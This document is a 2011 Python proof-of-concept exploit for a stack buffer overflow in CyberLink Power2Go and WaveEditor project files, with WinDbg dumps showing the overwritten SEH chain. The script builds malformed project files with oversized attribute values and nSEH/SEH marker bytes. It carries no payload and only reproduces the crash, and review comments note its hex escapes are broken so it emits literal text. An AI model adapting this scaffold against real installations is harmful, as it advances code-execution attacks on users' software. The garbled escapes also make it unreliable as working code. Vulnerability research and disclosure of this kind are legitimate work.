# Title : CyberLink Multiple Products File Project Handling Stack Buffer Overflow POC
# Published : 2011-12-09
# Author :
#!/usr/bin/python
#
# Exploit Title: CyberLink Multiple Products File Project Handling Stack Buffer Overflow POC
# by: modpr0be[at]spentera[dot]com (@modpr0be)
# Platform: Windows
# Tested on: Windows XP SP3, Windows 7 SP1 with:
# CyberLink Power2Go 7 (build 196)
# CyberLink Power2Go 8 (build 1031)
# CyberLink WaveEditor 2.0 (build 2204)
# Software Link: http://www.cyberlink.com/downloads/trials/index_en_US.html
# CVE : -
### Software Description
# CyberLink Power2Go is all-media disc burning software.
# Copy all your media to any disc with Power2Go 8! With new System Recovery tools
# and over 5000 free DVD menus to choose from on DirectorZone.com, Power2Go 8 not
# only burns everything but allows you to create pro-like DVDs, rip CDs and
# safeguard valuable data.
# CyberLink Wave Editor helps users convert audio formats when producing, editing,
# or creating backups of audio or video. This additional tool has also been included
# from PowerDirector 9 through PowerDirector 10, and is now included in Power2Go 8.
### Vulnerability Details
# Most CyberLink products use a built-in project file with their own format and
# extension. This file usually holds the user's recently modified project or work.
# Most of these file types contain these elements:
# <File src=
# <File name=
# Generally, those elements are filled with a source path or filename. In both
# products an overlong value there leads to command execution because the address of
# the SE Handler is overwritten with 0x00410041 (the PoCs below only demonstrate the crash).
# Notes:
# I cannot find any good return address for WaveEditor; if you can make it
# through the hard way, kudos!!
### Vendor logs:
# 10/10/2011 - Bug found
# 10/11/2011 - Vendor contacted
# 10/11/2011 - Vendor replied and requested POC
# 10/11/2011 - POC sent to vendor
# 10/31/2011 - Vendor said the POC will be researched
# 10/27/2011 - Submitted to CERT
# 11/09/2011 - CyberLink updated the product
# 11/09/2011 - POC still works on the latest version
# 12/09/2011 - No response from vendor, POC release.
import time,sys
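def power2go():
    """Write a Power2Go project file (overflow.p2g) that reproduces the crash.

    The file is a Power2Go project whose ``<File name="...">`` value is an
    oversized string: 778 filler characters, two two-byte markers (one for the
    nSEH slot, one for the SEH slot) and 4200 bytes of padding.  The Power2Go
    dump at the end of this file shows those markers, widened to UTF-16, sitting
    in the exception registration record, so this is a crash reproducer only:
    no return address or payload is placed in the buffer.

    Side effects: creates ``overflow.p2g`` in the current directory and prints
    progress messages.  On IOError (for example, no write permission in the
    current directory) a message is printed and the process exits.

    NOTE(review): the ``"x3c..."`` literals look like ``\\x..`` hex escapes
    whose backslashes were lost in transcription (likewise ``"rn"``); they are
    kept byte-for-byte as found, so as written the script emits that literal
    text rather than the bytes the author intended.
    """
    # Project preamble: the hex literal spells out the <Project ...>,
    # <Information/>, <Compilation> and <DataDisc ...> opening elements with
    # their attributes, up to and including the closing ">" of <DataDisc>.
    header = (
        "x3cx50x72x6fx6ax65x63x74x20x6dx61x67x69x63"
        "x3dx22x69x6ex73x65x63x75x72x69x74x79x22x20"
        "x76x65x72x73x69x6fx6ex3dx22x31x30x31x22x3e"
        "x0dx0ax3cx49x6ex66x6fx72x6dx61x74x69x6fx6e"
        "x2fx3ex0dx0ax3cx43x6fx6dx70x69x6cx61x74x69"
        "x6fx6ex3ex0dx0ax3cx44x61x74x61x44x69x73x63"
        "x20x0dx0ax64x69x73x63x4ex61x6dx65x3dx22x49"
        "x4ex53x45x43x55x52x49x54x59x22x20x0dx0ax66"
        "x69x6cx65x44x61x74x65x3dx22x6fx72x69x67x69"
        "x6ex61x6cx22x20x66x69x6cx65x54x69x6dx65x3d"
        "x22x30x22x20x0dx0ax64x69x73x63x54x79x70x65"
        "x3dx22x63x64x22x20x0dx0ax73x65x73x73x69x6f"
        "x6ex53x69x7ax65x3dx22x30x22x20x0dx0ax50x4f"
        "x57x42x75x72x6ex65x64x53x69x7ax65x3dx22x30"
        "x22x20x0dx0ax53x65x63x75x72x65x64x44x61x74"
        "x61x3dx22x66x61x6cx73x65x22x20x0dx0ax57x68"
        "x6fx6cx65x53x65x63x75x72x65x64x44x61x74x61"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax53x65x63"
        "x75x72x69x74x79x4bx65x79x53x69x7ax65x3dx22"
        "x31x36x22x20x0dx0ax48x69x64x65x46x69x6cx65"
        "x4ex61x6dx65x3dx22x66x61x6cx73x65x22x20x0d"
        "x0ax62x6fx6fx74x61x62x6cx65x3dx22x66x61x6c"
        "x73x65x22x20x0dx0ax62x6fx6fx74x46x6cx6fx70"
        "x70x79x3dx22x66x61x6cx73x65x22x20x0dx0ax62"
        "x6fx6fx74x49x6dx61x67x65x3dx22x22x20x0dx0a"
        "x61x75x74x6fx52x75x6ex45x78x65x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e"
        "x45x78x65x50x61x74x68x3dx22x22x20x0dx0ax61"
        "x75x74x6fx52x75x6ex49x63x6fx6ex3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e"
        "x49x63x6fx6ex50x61x74x68x3dx22x22x20x0dx0a"
        "x41x75x74x6fx53x70x6cx69x74x44x69x73x63x3d"
        "x22x66x61x6cx73x65x22x20x0dx0ax44x69x73x63"
        "x53x70x6cx69x74x3dx22x66x61x6cx73x65x22x20"
        "x0dx0ax41x75x74x6fx4fx76x65x72x42x75x72x6e"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax44x61x74"
        "x61x50x72x6ax74x6fx56x69x64x65x6fx50x72x6a"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax73x69x6d"
        "x75x6cx61x74x69x6fx6ex3dx22x66x61x6cx73x65"
        "x22x20x0dx0ax62x75x72x6ex50x72x6fx6fx66x3d"
        "x22x74x72x75x65x22x20x0dx0ax63x6cx6fx73x65"
        "x44x69x73x63x3dx22x66x61x6cx73x65x22x20x0d"
        "x0ax76x65x72x69x66x79x44x69x73x63x3dx22x66"
        "x61x6cx73x65x22x20x0dx0ax64x65x66x65x63x74"
        "x6dx61x6ex61x67x65x6dx65x6ex74x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax63x6fx70x69x65x73x3d"
        "x22x31x22x20x0dx0ax62x75x72x6ex53x70x65x65"
        "x64x3dx22x30x22x20x0dx0ax63x64x54x65x78x74"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax41x75x64"
        "x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66"
        "x61x6cx73x65x22x20x0dx0ax41x75x64x69x6fx47"
        "x61x70x54x69x6dx65x3dx22x32x22x20x0dx0ax46"
        "x69x6cx65x53x79x73x74x65x6dx3dx22x49x53x4f"
        "x39x36x36x30x5fx4ax4fx4cx49x45x54x22x3e")
    # Remaining <File ...> attributes (src="C:\abc.txt", operation="add", ...),
    # the self-closing "/>" and the </DataDisc></Compilation></Project> tail.
    body = (
        "x73x72x63x3dx22x43x3ax5cx61x62x63x2ex74x78"
        "x74x22x20x0dx0ax6fx70x65x72x61x74x69x6fx6e"
        "x3dx22x61x64x64x22x20x0dx0ax62x75x72x6ex73"
        "x74x61x74x75x73x3dx22x6ex6fx74x62x75x72x6e"
        "x22x20x0dx0ax73x69x7ax65x3dx22x32x39x32x38"
        "x36x34x22x20x0dx0ax53x68x6fx77x53x69x7ax65"
        "x3dx22x32x39x32x38x36x34x22x20x0dx0ax41x6c"
        "x6cx6fx77x45x6ex63x72x79x70x74x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax53x65x63x75x72x65x64"
        "x52x6fx6fx74x3dx22x66x61x6cx73x65x22x20x0d"
        "x0ax66x69x6cx65x54x69x6dx65x3dx22x31x32x39"
        "x33x36x37x33x34x31x35x30x39x37x33x36x38x37"
        "x34x22x20x0dx0ax6fx6cx64x3dx22x66x61x6cx73"
        "x65x22x20x0dx0ax74x65x6dx70x66x69x6cx65x3d"
        "x22x66x61x6cx73x65x22x20x0dx0ax74x65x6dx70"
        "x64x69x72x6cx65x76x65x6cx3dx22x30x22x20x0d"
        "x0ax66x6fx72x61x75x64x69x6fx74x72x61x63x6b"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax74x61x72"
        "x67x65x74x41x75x64x69x6fx43x44x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax64x61x74x61x69x74x65"
        "x6dx74x79x70x65x3dx22x30x22x20x0dx0ax6dx76"
        "x70x3dx22x30x22x20x0dx0ax61x75x64x69x6fx53"
        "x75x62x74x79x70x65x3dx22x30x22x2fx3ex0dx0a"
        "x3cx2fx44x61x74x61x44x69x73x63x3ex0dx0ax3c"
        "x2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex0d"
        "x0ax3cx2fx50x72x6fx6ax65x63x74x3e")
    pgfile = "overflow.p2g"
    # Oversized value for the <File name="..."> attribute: filler up to the
    # exception record, a marker pair for nSEH, a marker pair for SEH, padding.
    junk = "A" * 778
    nseh = "x42x42"
    seh = "x43x43"
    sisa = "x44" * 4200
    hell = "x3cx46x69x6cx65" + "rn"  # <File
    hell += "name=" + '"' + junk + nseh + seh + sisa + '"'
    try:
        # open() sits inside the try so that a permission error on the target
        # directory reaches the handler below instead of escaping as a
        # traceback (the original opened the file before the try); the
        # with-block closes the handle on every path, including a failed write.
        with open(pgfile, 'w') as f:
            f.write(header + "rn" + hell + "rn" + body)
    except IOError:
        print("[-] Could not write to destination folder, check permission..")
        sys.exit()
    print("[!] Generating " + pgfile + " ..")
    time.sleep(1)  # cosmetic pause between the progress messages
    print("[+] File " + pgfile + " successfully created!")
    print("[*] Now open project file '" + pgfile + "' with CyberLink Power2Go.")
    print("[*] Good luck ;)")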
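def waveeditor():
    """Write a WaveEditor project file (overflow.wve) that reproduces the crash.

    The file is a WaveEditor 2.0 project whose ``<File Src="...">`` value is
    3000 filler characters.  The WaveEditor dump at the end of this file shows
    the filler, widened to UTF-16, in the exception registration record; no
    return address or payload is used (see the author's notes above), so this
    is a crash reproducer only.

    Side effects: creates ``overflow.wve`` in the current directory and prints
    progress messages.  On IOError (for example, no write permission in the
    current directory) a message is printed and the process exits.

    NOTE(review): the ``"x3c..."`` literals look like ``\\x..`` hex escapes
    whose backslashes were lost in transcription; they are kept byte-for-byte
    as found, so as written the script emits that literal text rather than the
    bytes the author intended.
    """
    # <Project Application="WaveEditor" Version="2.0">
    header = ("x3cx50x72x6fx6ax65x63x74x20x41x70x70x6cx69x63x61"
              "x74x69x6fx6ex3dx22x57x61x76x65x45x64x69x74x6fx72x22x20"
              "x56x65x72x73x69x6fx6ex3dx22x32x2ex30x22x3e")
    wvefile = "overflow.wve"
    junk = "A" * 3000
    hell = "x3cx46x69x6cx65x20x53x72x63x3d"  # <File Src=
    hell += '"' + junk + '"' + "x3e"
    # Tail of the document: <BookmarkList/></File>, an empty <Compilation>
    # holding an <AudioCD .../> element, and </Project>.  (The original
    # assigned `fill` twice; only this second value was ever written.)
    fill = ("x3cx42x6fx6fx6bx6dx61x72x6bx4cx69x73x74x2fx3ex3c"
            "x2fx46x69x6cx65x3ex3cx43x6fx6dx70x69x6cx61x74x69x6fx6e"
            "x3ex3cx41x75x64x69x6fx43x44x20x62x75x72x6ex50x72x6fx6f"
            "x66x3dx22x74x72x75x65x22x20x63x6fx70x69x65x73x3dx22x30"
            "x22x20x62x75x72x6ex53x70x65x65x64x3dx22x30x22x20x41x75"
            "x64x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66x61x6cx73"
            "x65x22x20x41x75x64x69x6fx47x61x70x54x69x6dx65x3dx22x32"
            "x22x2fx3ex3cx2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex3c"
            "x2fx50x72x6fx6ax65x63x74x3e")
    try:
        # open() sits inside the try so that a permission error on the target
        # directory reaches the handler below instead of escaping as a
        # traceback (the original opened the file before the try); the
        # with-block closes the handle on every path, including a failed write.
        with open(wvefile, 'w') as f:
            f.write(header + hell + fill)
    except IOError:
        print("[-] Could not write to destination folder, check permission..")
        sys.exit()
    print("[!] Generating " + wvefile + " ..")
    time.sleep(1)  # cosmetic pause between the progress messages
    print("[+] File " + wvefile + " successfully created!")
    print("[*] Now open project file '" + wvefile + "' with CyberLink WaveEditor.")
    print("[*] Good luck ;)")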
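# Interactive menu: ask which product's project file to generate, at most
# twice, then exit after the chosen generator has run.
print("[*] CyberLink Multiple Products File Project Processing Stack Buffer Overflow POC.")
print("[*] by modpr0be <modpr0be[at]spentera[dot]com> | @modpr0be")
print("t1.CyberLink Power2Go <= 8.0")
print("t2.CyberLink WaveEditor <= 2.0")

# Read the answer as plain text.  The original used Python 2's input(), which
# is eval(raw_input()) and executes whatever is typed at the prompt; the menu
# only needs an integer, so parse it with int() instead.
try:
    _read_line = raw_input
except NameError:  # Python 3: input() already returns the text unevaluated
    _read_line = input

for _attempt in range(2):  # the original loop ran twice (a = 0 .. 2)
    try:
        op = int(_read_line("[!] Choose the product: "))
    except ValueError:
        op = None  # non-numeric answer: fall through to the retry message
    if op == 1:
        power2go()
        sys.exit()
    elif op == 2:
        waveeditor()
        sys.exit()
    else:
        print("[-] Oh plz.. pick the right one :)rn")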
### DUMP OF POWER2GO
#(d18.c60): Break instruction exception - code 80000003 (first chance)
#eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c90120e esp=07d4ffcc ebp=07d4fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#ntdll!DbgBreakPoint:
#7c90120e cc int 3
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:022> g
#(d18.d40): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=ec8b55ff ebx=010358b0 ecx=78ad8951 edx=005b12fc esi=00430043 edi=0012d69c
#eip=ec8b55ff esp=0012ca70 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#ec8b55ff ?? ???
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\CyberLink\Power2Go8\Power2Go8.exe -
#0:000> !exchain
#0012ca9c: Power2Go8!CCLAuMixerAPI::operator=+156ba8 (00560dc8)
#0012d104: Power2Go8!CCLAuMixerAPI::operator=+25e23 (00430043)
#Invalid exception stack at 00420042
#0:000> d 0012d104
#0012d104 42 00 42 00 43 00 43 00-43 00 43 00 43 00 43 00 B.B.C.C.C.C.C.C.
#0012d114 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d124 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d134 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d144 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d154 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d164 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d174 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
### DUMP OF WAVE EDITOR
#(e44.734): Break instruction exception - code 80000003 (first chance)
#eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c90120e esp=00e5ffcc ebp=00e5fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#ntdll!DbgBreakPoint:
#7c90120e cc int 3
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:016> g
#(e44.e48): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00410041 ebx=ffffffff ecx=0240868b edx=420b1802 esi=022ccbe8 edi=00d2f848
#eip=024c47af esp=0012c424 ebp=0012c42c iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\CyberLink\WaveEditor\WaveKernel.dll -
#WaveKernel!ReleaseWaveKernelClient+0x12a8f:
#024c47af 8b4208 mov eax,dword ptr [edx+8] ds:0023:420b180a=????????
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:000> !exchain
#0012c898: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\CyberLink\WaveEditor\WaveEditor.exe -
#WaveEditor!CCLAuMixerAPI::CCLAuMixerAPI+da61 (00410041)
#Invalid exception stack at 00410041
#0:000> d 0012c898
#0012c898 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8e8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8f8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c908 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#